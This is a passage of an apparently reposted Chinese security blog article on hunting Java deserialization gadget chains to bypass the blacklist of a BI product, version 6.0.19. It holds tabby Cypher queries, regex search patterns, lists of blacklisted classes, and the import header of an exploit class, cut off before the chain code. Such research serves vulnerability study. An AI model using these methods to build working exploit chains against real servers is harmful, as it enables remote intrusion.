专栏名称: 衡阳信安
船山院士网络安全团队唯一公众号,为国之安全而奋斗,为信息安全而发声!
目录
相关文章推荐
国家知识产权局  ·  开工生产忙 多地交通重点工程建设冲刺首季“开门红” ·  10 小时前  
中国知识产权报  ·  商标小课堂上课啦!一文了解商品包装、装潢的保护路径 ·  3 天前  
IPRdaily  ·  下周四15:00直播! ... ·  2 天前  
IPRdaily  ·  考生注意!国知局公布2025年度公务员面试名 ... ·  3 天前  
上城区市场监管局  ·  数据知识产权登记篇(一) ·  3 天前  
51好读  ›  专栏  ›  衡阳信安

某bi V 6.0.19 尝试绕过黑名单

衡阳信安  · 公众号  ·  · 2024-09-05 00:00

正文

Cypher语法

本次使用tabby来分析相关利用链子,会用到Cypher的相关语句,
如以下语句是查询readobject被谁调用,深度为5,查询20条链, 

match (source:Method {NAME:"readObject"})
match (sink:Method {NAME:"put", CLASSNAME:"java.util.Hashtable"})CALL]-(m1:Method)
call apoc.algo.allSimplePaths(source, m1, "ALIAS>|CALL>", 5) yield path
return * limit 20

通过寻找equals函数到toString函数的链子,其中source点可序列化 

match (source:Method)HAS]-(c:Class)-[:INTERFACE|EXTENDS*]->(c1:Class {NAME:"java.io.Serializable"})
where source.NAME in ["equals"]
and source.CLASSNAME in ["com.fr.esd.query.DSQueryEntity"]
match (sink:Method {NAME:"toString"})CALL]-(m1:Method)
call apoc.algo.allSimplePaths(source, m1, "ALIAS>|CALL>", 2) yield path
return * limit 2

可设置多个source点,然后定义最终的sink点, 

match (source:Method) where source.NAME in ["equals","hashCode","compareTo"] 
match (sink:Method {NAME:"toString"})CALL]-(m1:Method)
call apoc.algo.allSimplePaths(source, m1, "ALIAS>|CALL>", 5) yield path
return * limit 1

分析

在分析过程中,可以根据以下草稿,这里可以利用正则去匹配,不过费时费力,因此可以去使用tabby来分析, 

入口hashmaphashtable
hashcode()   equals(key)    tostring()  m.get(key) readobject()

最终调用到tostring

正则表达式    hashcode\(((?!public)[\s\S]){1,1000}[.]toString
 readobject\(((?!public)[\s\S]){1,1000}[.](toString|put|compareto|getValue|getkey)

hashcode+tostring   
readobject+tostring   
get+tostring    
equals+tostring    

readobject->put

readobject->put
    StringComparator
TreeMap.put->compare->compareto




    
+tostring

TreeMap.put->compare->compareto->getValue+tostring

TreeMap.put->compare->compareto->getkey+tostring


 (readobject|hashcode|equals)\(((?!public)[\s\S]){1,1000}[.]put\(
第二希望在equals找到put
第一希望hashcode->getValue->tostring

查找equals->...->toString, 

match (source:Method)HAS]-(c:Class)-[:INTERFACE|EXTENDS*]->(c1:Class {NAME:"java.io.Serializable"})
where source.NAME in ["equals"] 
match (sink:Method {NAME:"toString", CLASSNAME:"java.lang.Object"})CALL]-(m1:Method)
call apoc.algo.allSimplePaths(source, m1, "ALIAS>|CALL>", 7) yield path
where none(n in nodes(path) where n.CLASSNAME in ["com.fr.esd.query.DSQueryEntity", "com.fr.base.PaperSize", "java.util.EnumMap", "java.time.temporal.WeekFields", "sun.security.util.DerValue", "sun.security.x509.AlgorithmId", "java.util.concurrent.ConcurrentHashMap", "java.util.Hashtable", "com.fr.file.CacheManager$DBKey4Procedure", "com.fr.third.jgroups.stack.RouterStubManager$Target", "javax.security.auth.Subject", "java.lang.String", "sun.security.x509.CertificateExtensions", "com.fr.retry.Predicates$IsEqualToPredicate", "java.text.AttributedCharacterIterator$Attribute", "sun.security.x509.CRLExtensions", "java.util.AbstractMap", "com.fr.plugin.basic.CloseableUtils", "com.fr.data.dao.ClassArrayKey$KEY", "com.fr.base.headerfooter.TextHFElement", "com.fr.stable.version.ProductVersion", "com.fr.cluster.engine.member.persistence.FineClusterNode", "java.util.jar.Attributes$Name", "java.lang.reflect.WeakCache$CacheValue", "java.lang.reflect.WeakCache$LookupValue", "sun.security.x509.OtherName"])
return * limit 20

查找hashCode->...->toString, 

match (source:Method)HAS]-(c:Class)-[:INTERFACE|EXTENDS*]->(c1:Class {NAME:"java.io.Serializable"})
where source.NAME in ["hashCode"] 
match (sink:Method {NAME:"toString", CLASSNAME:"java.lang.Object"})CALL]-(m1:Method)
call apoc.algo.allSimplePaths(source, m1, "ALIAS>|CALL>", 5) yield path
where none(n in nodes(path) where n.CLASSNAME in ["com.fr.esd.query.DSQueryEntity", "java.util.concurrent.ConcurrentHashMap$KeySetView", "sun.security.util.DerValue"])
return * limit 20

查找get->...->toString, 

match (source:Method)HAS]-(c:Class)-[:INTERFACE|EXTENDS*]->(c1:Class {NAME:"java.io.Serializable"})
where source.NAME in ["get"] 
match (sink:Method {NAME:"toString", CLASSNAME:"java.lang.Object"})CALL]-(m1:Method)
call apoc.algo.allSimplePaths(source, m1, "ALIAS>|CALL>", 5) yield path
where none(n in nodes(path) where n.CLASSNAME in ["java.time.LocalDate", "com.fr.esd.query.DSQueryEntity", "java.time.temporal.TemporalAccessor"])
return * limit 20

查找readobject->...->toString, 

match (source:Method)HAS]-(c:Class)-[:INTERFACE|EXTENDS*]->(c1:Class {NAME:"java.io.Serializable"})
where source.NAME in ["readObject"] 
match (sink:Method {NAME:"toString", CLASSNAME:"java.lang.Object"})CALL]-(m1:Method)
call apoc.algo.allSimplePaths(source, m1, "ALIAS>|CALL>", 6) yield path
where none(n in nodes(path) where n.CLASSNAME in ["com.fr.esd.query.DSQueryEntity", "java.security.Provider", "java.security.PermissionsHash", "java.security.Permissions", "java.util.PropertyPermissionCollection", "java.security.BasicPermissionCollection", "java.util.EnumMap", "java.io.FilePermissionCollection", "sun.security.util.DerValue", "java.util.concurrent.ConcurrentHashMap", "java.util.Locale", "com.fr.base.headerfooter.ImageHFElement", "java.lang.StringBuilder", "java.text.DecimalFormatSymbols", "com.fr.swift.adaptor.log.SqlConverter$8", "java.util.Hashtable"])
return * limit 20

以上的limit 20为深度,可从1开始调节,逐渐去排除利用链中不相关的节点,

因此尝试利用tabby来绕某系统的黑名单,最主要是找到一条能触发到toString的链子,
利用tabby查询到中间的这条链子,上面的get肯定是行不通的,

因此调试以下链能走到hashtable.equals, 

package org.example;
import com.fr.base.PaperSize;
import com.fr.base.Parameter;
import com.fr.chart.chartdata.JSONTableData;
import com.fr.esd.query.DSQueryEntity;
import com.fr.json.revise.EncodeException;
import com.fr.script.CalculatorMap;
import com.fr.serialization.JDKSerializer;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.*;
import oracle.jdbc.rowset.OracleCachedRowSet;
import org.apache.arrow.vector.util.JsonStringArrayList;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import javax.swing.UIDefaults;

import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;
import org.jcodings.util.Hash;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair






请到「今天看啥」查看全文


推荐文章
国家知识产权局  ·  开工生产忙 多地交通重点工程建设冲刺首季“开门红”
10 小时前
中国知识产权报  ·  商标小课堂上课啦!一文了解商品包装、装潢的保护路径
3 天前
IPRdaily  ·  下周四15:00直播! 未来展望:品牌专业人士在未来五年面临的挑战及应对方法
2 天前
IPRdaily  ·  考生注意!国知局公布2025年度公务员面试名单及时间|附面试安排
3 天前
上城区市场监管局  ·  数据知识产权登记篇(一)
3 天前
孤读先生  ·  女人的初老,是从这个部位开始的
7 年前
梧桐树下V  ·  人民币基金(人民币机构投资者)投资红筹项目路径及案例分析
7 年前
冷笑话  ·  来展示下你爸妈的朋友圈截图~哈哈哈这是一个神奇的地方~
7 年前
Linux爱好者  ·  关于 Linux 进程你所需要知道的一切
7 年前
客家圈  ·  赣州农村即将消失的八大神器,你见过几个?
7 年前
Sov5搜索   ·   小百科   ·   今天看啥   ·   移动版
51好读 - 好文章就要读起来!